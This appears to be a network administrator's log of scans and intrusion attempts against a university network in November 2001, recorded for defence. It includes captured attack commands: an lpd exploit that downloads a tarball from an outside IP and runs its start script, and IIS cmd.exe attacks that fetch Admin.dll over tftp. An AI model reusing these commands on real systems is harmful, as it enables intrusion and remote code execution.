Short summary of some of the attacks against us for Nov. 2001

time (EASTERN)  source_ip[:port] (dns name, if any)  attack/scan/notes

2001/11/01-06:15:35.85  61.147.60.87 (CHINANET Jiangsu province network,CN)  try to use 132.235.1.35 port 80
2001/11/01-07:25:36.27  61.147.60.198 (CHINANET Jiangsu province network,CN)  try to use 132.235.1.35 port 80
2001/11/01-07:29:53.34  212.47.236.145 (dyn-212-47-236-145.ppp.tiscali.fr)  scan net for port 21
2001/11/01-07:54:03.79  132.235.245.44 (edison.biotech.ohiou.edu)  scan 132.235.1.[1,2] for port 389 UDP
2001/11/01-08:17:23.56  61.147.60.152 (CHINANET Jiangsu province network,CN)  try to use 132.235.1.35 port 80, thru 2001/11/02-05:05:12.44
2001/11/01-12:22:17.87  62.149.130.183 (Technorail srl,IT)  slow scan of net, 1 high number port per ip
2001/11/01-17:22:56.36  204.118.178.241 (cblmdm204-118-178-241.buckeye-express.com)  scan net for port 137
2001/11/01-17:25:12.65  204.118.178.241 (cblmdm204-118-178-241.buckeye-express.com)  scan net for port 161
2001/11/01-17:27:50.93  204.118.178.241 (cblmdm204-118-178-241.buckeye-express.com)  portscan multiple machines
2001/11/01-19:20:08.20  61.147.229.67 (CHINANET Jiangsu province network,CN)  try to use 132.235.1.35 port 80
2001/11/01-20:35:55.69  61.147.60.87 (CHINANET Jiangsu province network,CN)  try to use 132.235.1.35 port 80
2001/11/01-22:54:42.38  132.235.164.69 (e4069.east-green.ohiou.edu)  scan net for port 21
2001/11/01-23:22:23.07  211.137.65.157 (China Mobile Communications Corporation,CN)  scan net for port 111 + buffer overflow attacks
2001/11/01-23:22:33.28  211.137.65.189 (China Mobile Communications Corporation,CN)  scan net for port 111 + buffer overflow attacks
2001/11/02-03:18:41.13  203.130.232.144:111 (www.telkomkal.com)  scan net for port 111
2001/11/02-12:11:45.93  64.245.51.82 (OriginNetworks,TX,US)  scan net for port 111 + buffer overflow attacks
2001/11/02-10:24:31.15  80.16.236.235 (RTC S.P.A.,IT)  scan net for port 111
2001/11/02-12:05:02.08  80.16.236.235 (RTC S.P.A.,IT)  buffer overflow attacks, statd
2001/11/02-14:04:11.16  211.154.103.70:21 (guangzhou branch,network 263 group,CN)  scan net for port 21
2001/11/03-17:01:23.81  132.235.245.77 (*.ohiou.edu)  start of Nimda attacks again....
2001/11/03-17:44:26.31  132.235.170.57 (w2057.west-green.ohiou.edu)  start of Nimda attacks again....
2001/11/03-07:57:44.23  64.168.3.86 (adsl-64-168-3-86.dsl.scrm01.pacbell.net)  scan net for port 515
2001/11/03-11:17:52.51  193.253.188.234 (ALyon-201-1-3-234.abo.wanadoo.fr)  scan net for port 21
2001/11/03-15:30:28.03  24.90.11.72 (24-90-11-72.si.rr.com)  scan net for port 21
2001/11/03-20:42:50.91  211.137.65.157 (China Mobile Communications Corporation,CN)  SCAN net for port 80 (yes, a scan, not Nimda)
2001/11/03-22:28:52.53  211.137.65.157 (China Mobile Communications Corporation,CN)  probe web servers (GET x HTTP)
2001/11/04-05:57:08.83  132.235.170.57 (w2057.west-green.ohiou.edu)  Nimda attacks again today....
2001/11/04-09:47:31.16  217.106.204.41 (Global-Alania ISP,RU)  scan net for port 21
2001/11/04-10:00:27.16  217.106.204.41 (Global-Alania ISP,RU)  portscan 132.235.1.1
2001/11/04-10:25:12.96  61.147.60.130 (CHINANET Jiangsu province network)  conn to 132.235.1.35 port 80
2001/11/04-10:40:51.26  62.83.140.164 (164-MAD2-X22.libre.retevision.es)  scan net for port 23
2001/11/04-10:54:45.74  62.83.136.148 (148-MAD2-X26.libre.retevision.es)  scan net for port 23
2001/11/04-11:28:59.74  62.83.135.156 (156-MAD2-X27.libre.retevision.es)  scan net for port 23
2001/11/04-12:44:02.68  217.80.150.243 (pD95096F3.dip.t-dialin.net)  scan net for port 21
2001/11/04-15:42:32.30  200.185.56.9 (opt-0-9.br.inter.net)  scan net, 1 packet to random high number port on random ips
2001/11/04-22:03:53.12  61.147.55.65 (CHINANET Jiangsu province network)  conn to 132.235.1.35 ports 21,80
2001/11/04-22:14:57.87  61.147.60.89 (CHINANET Jiangsu province network)  conn to 132.235.1.35 port 80
2001/11/04-23:22:10.57  193.253.203.63 (ABoulogne-103-1-1-63.abo.wanadoo.fr)  scan net for port 21
2001/11/04-23:52:31.94  208.235.227.196 (ABS-CBN,Palo Alto,CA,US)  scan net for port 111 + buffer overflow attacks
2001/11/05-00:39:43.58  200.18.6.95 (nte.udesc.br)  scan net for port 515 + buffer overflow attacks
2001/11/05-00:50:43.86  61.147.60.141 (CHINANET Jiangsu province network)  conn to 132.235.1.35 port 80
2001/11/05-03:06:04.37  61.147.53.131 (CHINANET Jiangsu province network)  pound on 132.235.1.35 port 21
2001/11/05-06:56:51.44  132.235.170.57 (w2057.west-green.ohiou.edu)  scan net for ports 445,139
2001/11/05-08:49:37.04  217.0.79.175 (pD9004FAF.dip.t-dialin.net)  scan net for port 21
2001/11/05-12:09:03.96  66.26.51.206:20 (rdu26-51-206.nc.rr.com)  scan net for port 21
2001/11/05-14:45:00.81  211.46.58.193 (Daelim Elementary School,Chungju City,KR)  scan net for port 111
2001/11/05-21:02:56.97  61.177.254.29 (CHINANET Jiangsu province network)  probe port 21 on 132.235.1.35
2001/11/05-22:35:48.47  202.96.209.186 (CHINANET Shanghai province network,CN)  scan net for port 111 + rstatd buffer overflow attacks
2001/11/05-23:50:57.69  198.111.39.240 (WWW4.LTU.EDU)  scan net for port 111 + buffer overflow attacks
2001/11/06-02:51:44.59  216.72.235.3 (AEROCONTINENTE,FL,US)  scan net for port 80 (whisker splice attack)
2001/11/06-07:53:33.30  202.96.209.186 (CHINANET Shanghai province network,CN)  scan net for port 111, rstatd attack
2001/11/06-10:36:05.29  64.9.46.206 (Finger Lakes Press Inc.,NY,US)  scan net for port 21, ftp SITE EXEC attack
2001/11/06-13:02:44.90  63.81.174.6 (KPMG, LLP,VA,US)  scan net for port 111, then 21 on select ips, ftp SITE EXEC attack
2001/11/06-14:14:51.33  217.224.197.147 (pD9E0C593.dip.t-dialin.net)  scan net for port 21, anon ftp
2001/11/07-00:21:01.37  203.251.80.50 (taegu-cs-2.kornet.nm.kr)  scan net for port 515
2001/11/07-00:24:56.21  203.251.80.50 (taegu-cs-2.kornet.nm.kr)  start of intensive buffer overflow attacks on port 515
2001/11/07-09:06:22.96  193.253.244.27 (ALagny-101-1-2-27.abo.wanadoo.fr)  scan net for port 21
2001/11/07-10:47:51.82  203.238.253.60 (Munhwa Broadcasting System,SEOUL,KR)  scan net for port 21
2001/11/07-17:06:15.95  195.12.96.180 (mail.akta.kz)  scan net for port 111 + buffer overflow attacks
2001/11/07-19:50:37.80  24.232.109.13 (OL13-109.fibertel.com.ar)  scan net for port 21
2001/11/07-23:49:28.64  204.215.251.130 (World Ramp,FL,US)  scan net for port 111 - rstatd attacks
2001/11/08-05:58:17.05  128.174.81.32 (tampico.cso.uiuc.edu)  start of large number of dns queries for SOA of domains
2001/11/08-07:37:45.25  64.34.202.41 (dsl-64-34-202-41.telocity.com)  scan net for port 111
2001/11/08-11:04:17.32  128.174.81.32 (tampico.cso.uiuc.edu)  start of hourly probe of port 1111 on dns servers
2001/11/08-16:05:02.86  132.235.144.195 (dhcp-144-195.cns.ohiou.edu)  scan random ips during day for ports 137,524
2001/11/08-16:07:09.63  211.251.205.194 (POKCHANG ELEMENTARY SCHOOL,KYONGGI,KR)  scan net for port 53
2001/11/08-17:23:41.67  200.206.165.19 (200-206-165-19.dsl.telesp.net.br)  scan net for port 515
2001/11/08-17:42:54.39  211.55.8.110 (HUMAN INCUBATOR CENTER,SEOUL,KR)  scan net for port 23
2001/11/08-19:29:28.48  66.108.114.41 (66-108-114-41.nyc.rr.com)  scan net for port 27374
2001/11/09-02:32:11.19  211.46.246.194 (Seokpo Elementary School,KYONGBUK,KR)  scan net for port 111
2001/11/09-05:49:32.01  192.189.218.110 (Chugach Electric Association,AK,US)  scan net for port 21
2001/11/09-05:57:03.20  192.189.218.110 (Chugach Electric Association,AK,US)  scan net for port 21
2001/11/09-06:04:11.07  128.174.81.32 (tampico.cso.uiuc.edu)  connect to port 1111 on nameservers
2001/11/09-22:14:19.55  64.59.58.60 (mail.pwcpa.com)  scan net for port 23
2001/11/09-22:43:24.02  143.235.18.23 (University of Wisconsin-Centers,Madison,WI,US)  scan net for port 1243
2001/11/10-01:53:53.16  212.16.34.9 (SERVER2.SSI.AT)  scan net for port 22 (SYN FIN scan)
2001/11/10-01:57:12.86  209.122.167.62 (cornerstonehost14.erols.com)  scan net for port 111
2001/11/10-06:25:51.44  132.235.104.134 (dhcp-104-134.cns.ohiou.edu)  scan net for ports 524,137 (slow scan, 1 per 5 hrs)
2001/11/10-10:31:42.98  206.47.188.14 (Real Time Tech Group,Ontario,CA)  scan net for port 23
2001/11/10-13:30:54.83  4.61.32.93 (lsanca1-ar23-4-61-032-093.vz.dsl.gtei.net)  scan net for port 21
2001/11/10-14:13:41.70  207.189.78.240 (s20000028su01.fplive.net)  scan net for ports 6970,6972
2001/11/10-15:14:24.79  210.178.168.206 (SONGUI GIRLS HIGH SCHOOL,KYONGBUK,KR)  scan net for port 111
2001/11/10-17:44:40.06  200.223.3.133 (?.TELEMAR-BA.NET.BR)  scan 1 high number port per machine on net, slow scan
2001/11/11-01:43:51.76  193.158.93.148 (Deutsche Telekom AG,STOLBERG,DE)  scan net for port 111
2001/11/11-03:35:47.75  193.158.93.148 (Deutsche Telekom AG,STOLBERG,DE)  start of buffer overflow attacks
2001/11/11-06:26:50.57  4.61.32.93 (lsanca1-ar23-4-61-032-093.vz.dsl.gtei.net)  scan net for port 21
2001/11/11-07:34:58.12  132.235.104.134 (dhcp-104-134.cns.ohiou.edu)  scan net for ports 524,137 (slow scan, 1 per 5 hrs)
2001/11/11-16:11:40.95  204.215.251.130 (World Ramp,FL,US)  scan net for port 111
2001/11/11-17:42:38.35  208.247.82.14 (Reynolds Plantation,Greensboro,GA,US)  scan net for port 111 + buffer overflow attacks
2001/11/11-19:29:20.76  131.123.241.9 (baker.internet2.kent.edu)  probe port 113 on 132.235.1.35
2001/11/11-21:11:31.54  195.223.1.130 (GENESYS SRL,IT)  scan net for port 21
2001/11/12-05:48:24.58  217.136.156.152 (adsl-72856.turboline.skynet.be)  scan net for port 21
2001/11/12-07:23:24.49  132.235.104.134 (dhcp-104-134.cns.ohiou.edu)  scan net for ports 524,137 (slow scan, 1 per 5 hrs)
2001/11/12-22:56:41.76  217.96.240.90 (pe90.opole.sdi.tpnet.pl)  scan net for port 515
2001/11/13-06:04:09.18  211.167.225.97 (BEIJING HUA-XIN-DA-SHA CO.LTD,BEIJING,CN)  large scale scan of net, multiple ports
2001/11/13-06:09:22.89  211.167.225.97 (BEIJING HUA-XIN-DA-SHA CO.LTD,BEIJING,CN)  portscan 132.235.2.51
2001/11/13-06:09:33.10  211.167.225.97 (BEIJING HUA-XIN-DA-SHA CO.LTD,BEIJING,CN)  portscan 132.235.3.136
2001/11/13-06:09:34.87  211.167.225.97 (BEIJING HUA-XIN-DA-SHA CO.LTD,BEIJING,CN)  other portscans, continuing to 2001/11/13-07:20:12.13
2001/11/13-06:26:01.86  132.235.144.195 (dhcp-144-195.cns.ohiou.edu)  scan net for port 524
2001/11/13-06:26:49.72  24.216.110.42 (the.GodFather.Dr-Ice.com)  scan 1 high number port per machine on net, slow scan all day
2001/11/13-07:32:36.92  128.175.110.17 (host17.facil.udel.edu)  scan net for port 111
2001/11/13-09:27:52.28  143.248.158.85 (neuron.kaist.ac.kr)  scan net for port 111
2001/11/13-09:32:06.37  128.175.110.17 (host17.facil.udel.edu)  start of buffer overflow attacks
2001/11/13-11:55:13.80  143.248.158.85 (neuron.kaist.ac.kr)  start of buffer overflow attacks
2001/11/13-19:21:11.53  193.252.36.80 (AToulouse-101-1-1-80.abo.wanadoo.fr)  scan net for port 21
2001/11/14-09:56:14.28  217.128.23.104 (AAubervilliers-101-1-4-104.abo.wanadoo.fr)  scan net for port 21
2001/11/14-10:45:27.91  132.235.8.34 (redbudcm1a.cats.ohiou.edu)  portscan 132.235.3.154 ports 143,110,9110,9143,993,995
2001/11/14-12:21:43.58  24.176.176.176 (cc451128-b.rcrdva1.ca.home.com)  pound on 132.235.3.155:6346, to 2001/11/14-23:25:06.59
2001/11/14-13:08:36.79  66.74.26.90 (we-66-74-26-90.we.mediaone.net)  pound on 132.235.201.195:6346, to 2001/11/15-00:01:25.51
2001/11/14-17:37:25.45  208.198.210.6 (use210-6.carr.org)  scan net for port 111
2001/11/14-21:21:33.55  64.214.30.92 (irc.east.gblx.net)  scan 1 high number port per machine on net, slow scan all day
2001/11/15-05:58:00.73  64.214.30.92:6667 (irc.east.gblx.net)  scan 1 high number port per machine on net, slow scan all day
2001/11/15-06:12:44.87  200.185.45.37 (www.cbtenis.com.br)  scan 1 high number port per machine on net, slow scan all day
2001/11/15-07:14:36.07  62.149.172.248 (Technorail srl,IT)  scan net for port 23, then 111 on selected ips, then port 21
2001/11/15-11:34:46.58  65.106.151.170 (Concentric Network Corporation)  scan net for port 80
2001/11/15-14:57:00.82  134.93.129.123 (down.Physik.Uni-Mainz.DE)  scan net for port 1214
2001/11/15-16:49:15.61  132.235.96.197 (dhcp-096-197.cns.ohiou.edu)  portscan 132.235.15.36
2001/11/15-18:07:34.38  206.19.15.55 (san-28-d-55.san.dsl.cerfnet.com)  scan net for port 515 + buffer overflow attacks
2001/11/15-18:46:17.43  217.228.171.244 (pD9E4ABF4.dip.t-dialin.net)  scan net for port 1214 - slow scan til 2001/11/16-00:34:07.01
2001/11/15-23:08:00.93  206.130.183.130 (irc2.magic.ca)  scan 1 high number port per machine
2001/11/15-23:21:50.29  206.167.75.78 (cricri.qeast.net)  scan 1 high number port per machine
2001/11/16-04:08:45.95  195.159.0.90:6667 (irc.homelien.no)  scan 1 high number port per machine on net, slow scan all day
2001/11/16-05:58:28.50  134.93.129.123 (down.Physik.Uni-Mainz.DE)  scan net for port 1214
2001/11/16-07:49:35.76  195.159.0.90:666[6,7] (irc.homelien.no)  scan 1 high number port per machine on net, slow scan all day
2001/11/16-10:07:31.37  193.131.189.189 (Fiberlink Communications,GB)  scan net for port 111
2001/11/16-10:08:02.27  208.10.29.6:0 (BEN VARADA & ASSOCIATES,WA,US)  scan net for ports 1023`4,3072
2001/11/16-10:57:30.17  24.44.10.163 (ool-182c0aa3.dyn.optonline.net)  probe port 6346 on 132.235.201.213 about 100 times
2001/11/16-11:38:19.53  143.248.158.85 (neuron.kaist.ac.kr)  scan net for port 111
2001/11/16-11:51:35.28  193.131.189.189 (Fiberlink Communications,GB)  start of buffer overflow attacks (rstatd)
2001/11/16-12:09:58.69  132.235.159.34 (s7034.south-green.ohiou.edu)  portscan 132.235.16.101
2001/11/16-13:34:23.72  143.248.158.85 (neuron.kaist.ac.kr)  start of buffer overflow attacks
2001/11/17-00:41:09.30  210.99.14.65 (DOLMA ELEMENTARY SCHOOL,KYONGGI,KR)  scan net for port 111 + buffer overflow attacks (rstatd)
2001/11/17-06:20:54.97  195.159.0.90:666[6,7] (irc.homelien.no)  scan 1 high number port per machine on net, slow scan all day
2001/11/17-07:48:00.95  200.11.225.253 (TRUE, The Real Unix Experts,CARACAS,VE)  scan net for port 21
2001/11/18-06:25:53.90  195.159.0.90:666[6,7] (irc.homelien.no)  scan 1 high number port per machine on net, slow scan all day
2001/11/18-16:22:15.98  61.119.62.99 (Limited Company Asuka Consultant,JP)  scan net for port 111
2001/11/18-20:20:15.94  209.249.97.208 (infinite.wezl.org)  conn to 132.235.3.0, 1 packet to random high port every 5 minutes
2001/11/18-21:05:51.09  210.99.14.65 (DOLMA ELEMENTARY SCHOOL,KYONGGI,KR)  scan net for port 111 + buffer overflow attacks (rstatd)
2001/11/19-01:52:41.63  211.201.36.200 (Hanaro Telecom, Inc,KR)  scan net for port 21, anon ftp attack
2001/11/19-03:49:00.54  61.147.63.9 (CHINANET Jiangsu province network,CN)  probe port 21 on 132.235.1.35
2001/11/19-06:11:10.40  195.159.0.90:666[6,7] (irc.homelien.no)  scan 1 high number port per machine on net, slow scan all day
2001/11/19-15:59:58.35  62.82.87.39 (39-VALE-X52.libre.retevision.es)  1. try to login w/ login/passwd from ftp'd passwd file on ace
                                                                        2. portscan ace
                                                                        3. numerous (760) attacks against web server on ace
                                                                        4. Entity too stupid to cut and paste login/passwd on screen;
                                                                        5. instead, cut and pasted
                                                                        6. "Hacker's UTiLiTY JACKPOT Passwords." plus entire line from
                                                                        7. unencrypted passwd file.
2001/11/19-18:22:44.49  132.235.8.76 (securityscan.cns.ohiou.edu)  portscan 132.235.1.[1,2,3]
2001/11/20-07:00:31.59  61.142.0.171 (CHINANET Guangdong province network,CN)  scan net for port 80
2001/11/20-07:17:17.57  202.30.143.101 (mail1.shinbiro.com)  scan 1 high number port per machine on net, slow scan all day
2001/11/20-10:08:19.58  146.229.4.165 (University of Alabama)  portscan 132.235.19.44
2001/11/20-14:03:59.31  209.246.131.177 (dialup-209.246.131.177.Dial1.Dallas1.Level3.net)  portscan 132.235.1.1
2001/11/20-14:07:19.01  209.246.131.177 (dialup-209.246.131.177.Dial1.Dallas1.Level3.net)  1. try to telnet/ftp to 132.235.1.1 as root
                                                                                            2. and others, using passwds from fake
                                                                                            3. password file on 132.235.1.2.
2001/11/20-14:19:19.74  209.245.231.214 (dialup-209.245.231.214.Dial1.Dallas1.Level3.net)  portscan 132.235.1.2
2001/11/20-14:33:28.96  209.245.237.29 (dialup-209.245.237.29.Dial1.Dallas1.Level3.net)  portscan 132.235.1.2
2001/11/20-23:08:39.29  80.11.192.147 (ABesancon-101-1-4-147.abo.wanadoo.fr)  scan net for port 21
2001/11/21-00:57:54     80.11.192.147 (ABesancon-101-1-4-147.abo.wanadoo.fr)  scan net for port 21
2001/11/21-07:22:13     213.154.73.162 (Societe Nationale Des Telecommunications Du Senegal,SN)  scan net for port 111
2001/11/21-08:34:48.19  171.68.99.25 (pgavazzi-lnx.cisco.com)  several probes to port 80 on 132.235.1.68. Weird.
2001/11/21-10:30:52.50  199.125.55.250 (mcinternet01.ceg.com)  heavy portscan of 132.235.1.2
2001/11/21-12:46:38     217.136.5.218 (adsl-34266.turboline.skynet.be)  scan net for port 21
2001/11/21-12:46:38.08  217.136.5.218 (adsl-34266.turboline.skynet.be)  scan net for port 21
2001/11/21-13:53:22.59  195.215.184.253 (0xc3d7b8fd.abnxx3.adsl.tele.dk)  transfer of warez to hacked machine
2001/11/21-13:53:53.92  24.31.173.163 (dhcp31173163.columbus.rr.com)  portscan 132.235.16.170
2001/11/21-14:06:15     132.235.197.29 (netmgt1.cns.ohiou.edu)  scan net for port 161
2001/11/21-16:43:04.76  132.248.168.29 (tauro.dgsca.unam.mx)  scan net for port 111
2001/11/21-18:36:44.31  132.248.168.29 (tauro.dgsca.unam.mx)  start of buffer overflow attacks
2001/11/21-21:20:49.82  24.15.241.31 (c117785-a.alntn1.tx.home.com)  scan net for port 110
2001/11/21-21:20:49.97  4.33.170.77 (evrtwa1-ar3-170-077.evrtwa1.dsl.gtei.net)  scan net for port 110
2001/11/21-21:20:50.16  216.164.56.197 (r95aag006730.nyr.cable.rcn.com)  scan net for port 110
2001/11/21-21:20:50.44  65.92.44.186 (HSE-Kitchener-ppp3507918.sympatico.ca)  scan net for port 110
2001/11/21-21:22:06.36  63.114.221.153 (customer-63-114-221-153.dialup.psouth.net)  scan net for port 110
2001/11/21-21:23:42.88  209.226.57.29 (Kapuskasing-29.nt.net)  scan net for port 110
2001/11/22-00:57:54.53  80.11.192.147 (ABesancon-101-1-4-147.abo.wanadoo.fr)  scan net for port 21
2001/11/22-07:06:46.21  80.11.192.147 (ABesancon-101-1-4-147.abo.wanadoo.fr)  scan net for port 21
2001/11/23-04:36:11.75  217.96.199.243 (pa243.zabrze-roosvelta.sdi.tpnet.pl)  scan net for ports 515 and 3879
2001/11/23-04:41:40.68  217.96.199.243 (pa243.zabrze-roosvelta.sdi.tpnet.pl)  1. attack line printer daemon on 132.235.4.27 with:
                                                                               2. TERM="linux"
                                                                               3. export PATH="/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/bin"
                                                                               4. lynx -dump http://202.85.122.30/red2.tar >/usr/lib/red.tar
                                                                               5. [ -f /usr/lib/red.tar ] || exit 0
                                                                               6. cd /usr/lib;tar -xvf red.tar;rm -rf red.tar;cd lib;./start.sh
                                                                               7. try to connect back to port 3879 on 132.235.4.27
                                                                               8. large number of buffer overflow attacks on 132.235.1.2
2001/11/23-04:56:38.03  202.103.209.38 (CHINANET Guangxi province network,CN)  scan net for port 80
2001/11/23-05:19:29.39  205.163.201.10 (ADC Telecom,MN,US)  scan net for port 80
2001/11/23-09:43:24.04  217.57.186.124 (OPENNET S.P.A.,IT)  scan net for port 23
2001/11/23-11:20:34.67  217.128.255.14 (ATuileries-106-1-2-14.abo.wanadoo.fr)  scan net for port 21
2001/11/23-17:20:01.10  193.251.47.224 (ALagny-101-1-1-224.abo.wanadoo.fr)  scan net for port 21
2001/11/23-19:40:32.09  212.2.223.63 (Provider Local Registry,TR)  scan net for port 21
2001/11/23-19:40:32.15  212.0.120.252 (LISP-SL-ES,ES)  scan net for port 21
2001/11/23-21:42:42.86  4.35.51.1 (lsanca1-ar8-051-001.lsanca1.dsl.gtei.net)  scan net with ping (from Sun Solaris box)
2001/11/24-04:37:44.41  212.160.11.65 (pa65.zabkowice-slaskie.sdi.tpnet.pl)  scan net for port 515, ident version
2001/11/24-06:12:19.03  200.185.45.37 (www.cbtenis.com.br)  scan 1 high number port per machine on net, slow scan all day
2001/11/24-09:54:03.86  172.189.141.56 (ACBD8D38.ipt.aol.com)  scan net for port 21
2001/11/24-14:26:13.01  217.136.158.129 (adsl-73345.turboline.skynet.be)  scan net for port 21
2001/11/24-16:48:06.42  210.243.244.245 (h245-210-243-244.seed.net.tw)  scan net for port 111
2001/11/24-17:44:43.06  24.198.55.21 (ROADRUNNER-NORTHEAST,VA,US)  scan net for ports 139,445
2001/11/25-01:18:40.46  211.210.121.155 (Hanaro Telecom, Inc.,KR)  scan net for port 111 - rstatd
2001/11/25-01:18:44.37  211.210.121.155 (Hanaro Telecom, Inc.,KR)  start of buffer overflow attacks - statd
2001/11/25-12:07:42.92  212.100.180.77 (212-100-180-77.adsl.easynet.be)  scan net for port 21
2001/11/25-13:12:50.18  62.161.77.122 (ca-ol-sqy-6-122.abo.wanadoo.fr)  probe portmapper on 132.235.1.1 - mountd
2001/11/25-18:43:57.18  208.37.244.170 (w170.z208037244.nyc-ny.dsl.cnc.net)  scan net for port 21
2001/11/25-22:22:00.28  132.254.84.2 (Instituto Tecnologico y de Estudios Superiores de Monterrey,MX)  probe 132.235.1.59:80 100 times
2001/11/26-02:58:01.84  211.5.254.68 (hiroshima west information service coop.,JP)  scan net for port 21
2001/11/26-06:52:39.61  132.240.40.63 (Vitalink Communications,MA,US)  scan port 80 on 132.235.1.35
2001/11/26-07:21:45.05  213.154.73.162 (Societe Nationale Des Telecommunications Du Senegal,SN)  scan net for port 111
2001/11/26-12:35:26.60  62.253.140.118 (pc1-ipsw2-0-cust118.cam.cable.ntl.com)  scan net for port 21
2001/11/26-16:52:21.15  217.10.197.54 (MobiFon S.A.,Bucharest,Romania)  scan 1 high number port per machine on net, slow scan all day
2001/11/26-19:22:23.63  168.143.176.173 (Verio, Inc.,CO,US)  scan net for ports 1024,3072
2001/11/26-20:17:48.54  132.250.112.76 (death-star.nrl.navy.mil)  scan net for port 80, IIS attacks
2001/11/26-20:28:56.89  132.250.151.18 (hu-pc.nrl.navy.mil)  scan net for port 80, IIS attacks
2001/11/26-20:32:42.28  168.143.176.173 (Verio, Inc.,CO,US)  scan net for ports 1024,3072
2001/11/26-20:39:30.64  217.10.197.54 (MOBIFON,BUCHAREST,RO)  scan 1 high number port per machine on net, slow scan all day
2001/11/26-22:25:56.70  204.101.179.3 (suroit.rocler.qc.ca)  scan 1 high number port per machine on net, slow scan all day
2001/11/26-23:15:34.32  4.61.33.207 (lsanca1-ar23-4-61-033-207.vz.dsl.gtei.net)  scan net for port 21
2001/11/27-00:02:46.45  61.147.44.199 (CHINANET Jiangsu province network,CN)  portscan net for port 80
2001/11/27-00:02:56.86  61.147.44.199 (CHINANET Jiangsu province network,CN)  scan net for port 80, check for GET...cmd.exe?/c+dir
2001/11/27-00:15:02.16  61.147.44.199 (CHINANET Jiangsu province network,CN)  1. attack several ips via web server, root.exe -
                                                                              2. tftp Admin.dll from 132.235.32.108 !!
2001/11/27-04:04:42.34  61.171.125.9 (CHINANET Shanghai province network,CN)  scan 132.235.1.35 for port 80
2001/11/27-04:22:36.14  61.147.44.209 (CHINANET Jiangsu province network,CN)  portscan net for port 80
2001/11/27-04:22:45.05  61.147.44.209 (CHINANET Jiangsu province network,CN)  scan net for port 80, ips in random order
2001/11/27-04:35:50.54  61.147.44.209 (CHINANET Jiangsu province network,CN)  IIS attack, tftp from 132.235.32.108
2001/11/27-05:48:43.16  217.229.69.92 (pD9E5455C.dip.t-dialin.net)  scan net for port 21
2001/11/27-05:49:00.24  217.229.69.92 (pD9E5455C.dip.t-dialin.net)  scan net for port 21
2001/11/27-06:53:45.74  209.98.24.254 (igloo.windchill.com)  IIS attack, tftp files from 132.253.10.103
2001/11/27-14:41:07.74  172.191.50.30 (ACBF321E.ipt.aol.com)  scan net for port 21
2001/11/27-16:23:55.66  62.253.140.118 (pc1-ipsw2-0-cust118.cam.cable.ntl.com)  scan net for port 21, anon ftp attacks
2001/11/27-17:01:19     210.0.202.100 (Hutchison Telecommunications (Hong Kong) Limited,HK)  scan net on port 22
2001/11/27-22:53:57.60  217.128.92.112 (ANeuilly-101-1-6-112.abo.wanadoo.fr)  scan net for port 21
2001/11/28-06:41:27.58  24.178.52.181 (c1807622-a.muskgn1.mi.home.com)  scan net for port 80
2001/11/28-06:41:28     24.178.52.181 (c1807622-a.muskgn1.mi.home.com)  scan net for port 80
2001/11/28-11:25:16.96  217.10.197.54 (MOBIFON,BUCHAREST,RO)  scan 1 high number port per machine on net, slow scan all day
2001/11/28-12:15:47.93  61.182.255.2 (CHINANET Hebei province network,CN)  scan net for port 111
2001/11/28-12:39:39.90  61.182.50.241 (CHINANET Hebei province network,CN)  scan net for port 111
2001/11/28-12:55:57.87  149.160.26.42 (Indiana University Southeast Computing Services,IN,US)  1. heavy, repeating scans of net
                                                                                               2. for ports 3879 and 515, 40/sec.
                                                                                               3. redhat 7.0 lprd overflow attack.
2001/11/28-16:05:37     62.82.83.218 (218-VALE-X26.libre.retevision.es)  1. use decrypted passwd/logins from passwd file snarfed by
                                                                         2. anon-ftp.
2001/11/28-16:22:45.71  200.181.172.153 (1-153.ctame701-3.telepar.net.br)  scan net for port 80, scan ping-nmap-icmp also
2001/11/28-18:12:26     24.198.55.21 (ROADRUNNER-NORTHEAST,VA,US)  scan 132.235.3.x for port 139
2001/11/28-22:14:05.56  62.180.231.5 (BT Ignite GmbH,DE)  scan ports 53,23,21,22 on 132.235.1.1
2001/11/28-23:13:30.64  216.133.163.119 (Prime Cable Of Chicago,US)  scan net for port 21
2001/11/29-06:49:47.37  217.10.197.54 (MobiFon S.A.,Romania)  scan 1 high number port per machine on net, slow scan all day
2001/11/29-13:05:43.39  132.235.104.134 (dhcp-104-134.cns.ohiou.edu)  scan net for ports 524,137,139
2001/11/29-13:54:01.90  195.232.62.9 (UUNET-HIL-PPP-POOL,Frankfurt PPP Client Pool,DE)  scan net for port 515
2001/11/29-15:30:50.66  212.143.33.7 (ADSLP33-NV-p7.adsl.netvision.net.il)  scan net for port 21
2001/11/29-17:50:45.79  217.136.9.62 (adsl-35134.turboline.skynet.be)  scan net for port 21
2001/11/29-23:03:31.20  61.177.254.221 (CHINANET Jiangsu province network,CN)  1. massive port 80 scans of net. Try ..\cmd.exe+ stuff,
                                                                               2. try tftp%20-i%20132.235.33.23%20GET%20Admin.dl
2001/11/30-06:41:05.95  210.226.107.114 (altamoda co.,ltd.,JP)  scan 132.235.1.43 for ports 6000[0,1],1000[8,9]
2001/11/30-07:59:32.16  4.61.33.207 (lsanca1-ar23-4-61-033-207.vz.dsl.gtei.net)  scan net for port 21, anon ftp attack
2001/11/30-07:59:32.75  4.61.33.207 (lsanca1-ar23-4-61-033-207.vz.dsl.gtei.net)  scan net for port 21
2001/11/30-08:42:09     129.187.148.52 (kilauea.cis.uni-muenchen.de)  scan net for port 22
2001/11/30-09:43:18.26  146.229.4.165 (University of Alabama)  >700 bad connects to 132.235.19.44 ports 7,21,70,80,143,119,110,25,...
2001/11/30-11:14:03.39  205.251.201.203 (Cable Atlantic Inc.,CA)  scan net for port 80
2001/11/30-15:03:27.67  217.136.2.55 (adsl-33335.turboline.skynet.be)  scan net for port 21
2001/11/30-20:15:05.33  211.158.6.22 (CQBN YU GAO IDC,CN)  scan net for port 111
2001/11/30-21:35:21.00  194.102.114.60 (GENERAL COMTRUST INC,PETROSANI,RO)  scan 1 high number port per machine on net, slow scan all day
2001/11/30-21:56:24.48  212.239.173.132 (u212-239-173-132.adsl.pi.be)  scan net for port 21 + anon ftp attacks
2001/11/30-23:12:08.82  163.121.254.105 (subnet254.idsc.gov.eg)  scan net for port 111
2001/11/30-23:12:10.08  163.121.254.105 (subnet254.idsc.gov.eg)  start of buffer overflow attacks (statdx)
2002/11/12-23:09:41.07  66.36.128.158 (dsl-128-158.aei.ca)  attack & penetrate 132.235.16.8 - ftpd port 14232